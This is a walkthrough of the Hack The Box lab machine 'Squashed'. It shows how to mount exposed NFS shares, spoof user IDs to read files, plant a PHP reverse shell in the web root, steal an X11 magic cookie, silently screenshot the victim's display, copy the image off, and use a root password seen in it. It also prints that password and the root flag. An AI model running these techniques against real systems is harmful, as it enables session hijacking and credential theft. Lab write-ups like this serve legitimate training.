Squashed

As always we start with AutoRecon and upload the XML outputs to Pentest.WS

The main ports to worry about here are 111 and 2049 (both NFS ports).  The Website is active, but NFS is really all you need to start.  Use:

┌──(cruggieri㉿kali-purple)-[~/Desktop]
└─$ showmount -e squashed.htb
Export list for squashed.htb:
/home/ross    *
/var/www/html *

Then you can create 2 directories in the mnt folder and mount the 2 NFS shares available.

┌──(cruggieri㉿kali-purple)-[~/Desktop]
└─$ sudo mkdir /mnt/1
                                                                                         
┌──(cruggieri㉿kali-purple)-[~/Desktop]
└─$ sudo mkdir /mnt/2
                                                                                          
┌──(cruggieri㉿kali-purple)-[~/Desktop]
└─$ sudo mount -t nfs squashed.htb:/var/www/html /mnt/1
                                                                                          
┌──(cruggieri㉿kali-purple)-[~/Desktop]
└─$ sudo mount -t nfs squashed.htb:/home/ross /mnt/2

From here, we can try to list them, but /mnt/1 throws permission denied errors.

┌──(root㉿kali-purple)-[/home/cruggieri/Desktop]
└─# ls -la /mnt/1
ls: cannot access '/mnt/1/.': Permission denied
ls: cannot access '/mnt/1/..': Permission denied
ls: cannot access '/mnt/1/.htaccess': Permission denied
ls: cannot access '/mnt/1/index.html': Permission denied
ls: cannot access '/mnt/1/images': Permission denied
ls: cannot access '/mnt/1/css': Permission denied
ls: cannot access '/mnt/1/js': Permission denied
total 0
d????????? ? ? ? ?            ? .
d????????? ? ? ? ?            ? ..
?????????? ? ? ? ?            ? css
?????????? ? ? ? ?            ? .htaccess
?????????? ? ? ? ?            ? images
?????????? ? ? ? ?            ? index.html
?????????? ? ? ? ?            ? js
                                                                                                                                                                                                                  
┌──(root㉿kali-purple)-[/home/cruggieri/Desktop]
└─# ls -la /mnt/2
total 68
drwxr-xr-x 14 1001 1001 4096 May 29 14:37 .
drwxr-xr-x  5 root root 4096 May 29 14:54 ..
lrwxrwxrwx  1 root root    9 Oct 20  2022 .bash_history -> /dev/null
drwx------ 11 1001 1001 4096 Oct 21  2022 .cache
drwx------ 12 1001 1001 4096 Oct 21  2022 .config
drwxr-xr-x  2 1001 1001 4096 Oct 21  2022 Desktop
drwxr-xr-x  2 1001 1001 4096 Oct 21  2022 Documents
drwxr-xr-x  2 1001 1001 4096 Oct 21  2022 Downloads
drwx------  3 1001 1001 4096 Oct 21  2022 .gnupg
drwx------  3 1001 1001 4096 Oct 21  2022 .local
drwxr-xr-x  2 1001 1001 4096 Oct 21  2022 Music
drwxr-xr-x  2 1001 1001 4096 Oct 21  2022 Pictures
drwxr-xr-x  2 1001 1001 4096 Oct 21  2022 Public
drwxr-xr-x  2 1001 1001 4096 Oct 21  2022 Templates
drwxr-xr-x  2 1001 1001 4096 Oct 21  2022 Videos
lrwxrwxrwx  1 root root    9 Oct 21  2022 .viminfo -> /dev/null
-rw-------  1 1001 1001   57 May 29 14:37 .Xauthority
-rw-------  1 1001 1001 2475 May 29 14:37 .xsession-errors
-rw-------  1 1001 1001 2475 Dec 27 09:33 .xsession-errors.old
                                                                                                                                                                                                                   
┌──(root㉿kali-purple)-[/home/cruggieri/Desktop]
└─# ls -ld /mnt/1
drwxr-xr-- 5 2017 www-data 4096 May 29 14:55 /mnt/1

One thing we can do is to create a user, mod it to that user ID (2017) and try it again.

Create a new user and force it to the 2017 User ID

┌──(root㉿kali-purple)-[/home/cruggieri/Desktop]
└─# useradd squashed
                                        
┌──(root㉿kali-purple)-[/home/cruggieri/Desktop]
└─# usermod -u 2017 squashed
                                                                                          
┌──(root㉿kali-purple)-[/home/cruggieri/Desktop]
└─# groupmod -g 2017 squashed          

Now we can clone PentestMonkey's PHP reverse shell script and mod it to our IP and have the server call back to us. 

Now if we repeat that user process, but using the 1001 user ID from mnt/2 (/home/ross) then we should be able to actually see what's in Ross' folder.  One thing that popped out is .Xauthority!  That's an easy screen grab for us, if we can mirror it.

Bingo!!! We have a Magic Cookie that will let us impersonate the session, mirror it, and do a silent screen grab!  We can do this by converting the cookie into Base64, then moving it to Alex and running a PATH-style export to point to it.  Here's the command list

squash2@kali-purple:/mnt/2$ cat ./.Xauthority

squashed.htb0MIT-MAGIC-COOKIE-1�����Q0q�j�cŒ

squash2@kali-purple:/mnt/2$ cat ./.Xauthority | base64
AQAADHNxdWFzaGVkLmh0YgABMAASTUlULU1BR0lDLUNPT0tJRS0xABDwgBbB8bxRAzBxj2qIY8WS

Then from the victim machine/Alex's terminal run:

lex@squashed:/home/alex$ echo 'AQAADHNxdWFzaGVkLmh0YgABMAASTUlULU1BR0lDLUNPT0tJRS0xABDwgBbB8bxRAzBxj2qIY8WS' | base64 -d > /tmp/.Xauthority
<BbB8bxRAzBxj2qIY8WS' | base64 -d > /tmp/.Xauthority
alex@squashed:/home/alex$ export XAUTHORITY=/tmp/.Xauthority
export XAUTHORITY=/tmp/.Xauthority

That will get the Magic Cookie in place.  If you look at the beginning of the reverse shell connection, you should see:

 20:11:10 up 34 min,  1 user,  load average: 0.03, 0.03, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
ross     tty7     :0               19:37   33:56   4.79s  0.03s /usr/libexec/gnome-session-binary --systemd --session=gnome

If not or you don't remember, you can use the "w" command to pull the session list up again:

alex@squashed:/home/alex$ w
w
 20:11:10 up 34 min,  1 user,  load average: 0.03, 0.03, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
ross     tty7     :0               19:37   33:56   4.79s  0.03s /usr/libexec/gnome-session-binary --systemd --session=gnome

So, this information is important for 2 reasons.  #1 It told me to LOOK at .Xauthority or Tight/Tiger VNC or something similar.  #2 It tells us the FROM session that we need to send this next command to.

alex@squashed:/home/alex$ xwd -root -screen -silent -display :0 > /tmp/screen.xwd
<-root -screen -silent -display :0 > /tmp/screen.xwd

That command tells Xauthority to select the root window (-root), send a GetImage request to the root window (-screen), do so silently (-silent), and what server to connect to (-display :0).  See, told you that :0 FROM address would be needed.  Then, it takes that GetImage and outputs it as /tmp/screen.xwd

From here, we NEED to get that screen grab to our machine so we change to the /tmp directory and use:

From Target:

alex@squashed:/tmp$ python3 -m http.server 8992
python3 -m http.server 8992
Serving HTTP on 0.0.0.0 port 8992 (http://0.0.0.0:8992/) ...
10.10.16.8 - - [29/May/2023 20:16:43] "GET /screen.xwd HTTP/1.1" 200 -

And From Attacker:

┌──(cruggieri㉿kali-purple)-[~/Desktop/HTB/Squashed]
└─$ wget http://squashed.htb:8992/screen.xwd
--2023-05-29 15:16:43--  http://squashed.htb:8992/screen.xwd
Resolving squashed.htb (squashed.htb)... 10.10.11.191
Connecting to squashed.htb (squashed.htb)|10.10.11.191|:8992... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1923179 (1.8M) [image/x-xwindowdump]
Saving to: ‘screen.xwd’

screen.xwd                                           100%[=====================================================================================================================>]   1.83M   525KB/s    in 3.8s    

2023-05-29 15:16:47 (495 KB/s) - ‘screen.xwd’ saved [1923179/1923179]

Just like that, the screen grab is ours!  But, we can't view it yet.  We need to convert it to png.  Fortunately, that's as easy as running:

┌──(cruggieri㉿kali-purple)-[~/Desktop/HTB/Squashed]
└─$ convert screen.xwd screen.png

In the screen grab, lookie here!  We've got some "root" creds!  We can try to ssh, but I did that and it failed.  So, instead I used su root in the Alex terminal and BAM! instant root!

su root
Password: cah$mei7rai9A

and there you have it!

root@squashed:/# cat /root/root.txt
cat /root/root.txt
cf468a9281c4779bf56fd01f3cf1372d

And with that, another box pwned.

VIDEO WALKTHROUGH

©2020 Phoenix Computing Solutions | Powered by Coffee, Sarcasm, and Insanity
  Everything included in the site is the intellectual property of Chris Ruggieri (Neocount Phoenix) and Phoenix Computing Solutions.
  This information should not be construed as legal advice. The owner can not be held liable for anything another entity does with this information.
  This information is solely the opinions and experiences of myself (Chris Ruggieri) and should not be construed as endorsement of any product, service, or of illegal activity

(GET WRITTEN PERMISSION PEOPLE!!)
  Any links I provide as a convenience and for informational purposes only; they do not constitute an endorsement or an approval by the owner of this site for any of the products, services or opinions of the corporation or organization or individual.
  Contact the external sites for answers to questions regarding its content.
  This Includes any links posted by Chris Ruggieri in any other websites, Social Media networks, Online Groups and Online sharing Websites.